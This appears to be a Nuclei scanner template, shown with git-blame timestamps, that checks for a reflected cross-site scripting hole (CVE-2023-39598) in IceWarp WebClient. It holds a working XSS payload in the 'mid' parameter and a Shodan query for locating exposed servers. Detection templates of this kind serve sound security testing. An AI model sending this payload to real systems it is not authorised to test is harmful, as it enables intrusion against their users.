2023-09-10 01:26:17 +00:00
id : CVE-2023-39598
2023-09-09 20:25:23 +00:00
info :
2023-09-10 01:26:17 +00:00
name : IceWarp Email Client - Cross Site Scripting
2023-09-09 20:25:23 +00:00
author : Imjust0
severity : medium
2023-09-10 01:26:17 +00:00
description : |
Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
2023-09-09 20:25:23 +00:00
reference :
2023-09-10 01:26:17 +00:00
- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
- https://nvd.nist.gov/vuln/detail/CVE-2023-39598
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
metadata :
max-request : 1
shodan-query : title:"icewarp"
verified : "true"
tags : cve,cve2023,xss,icewarp
2023-09-09 20:25:23 +00:00
http :
- method : GET
path :
2023-09-10 01:26:17 +00:00
- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
2023-09-09 20:25:23 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-09-10 01:26:17 +00:00
- "<img src=x onerror=confirm(document.domain)>"
- "icewarp"
condition : and
2023-09-10 14:34:42 +00:00
- type : word
part : header
words :
- "text/html"
2023-09-09 20:25:23 +00:00
- type : status
status :
- 200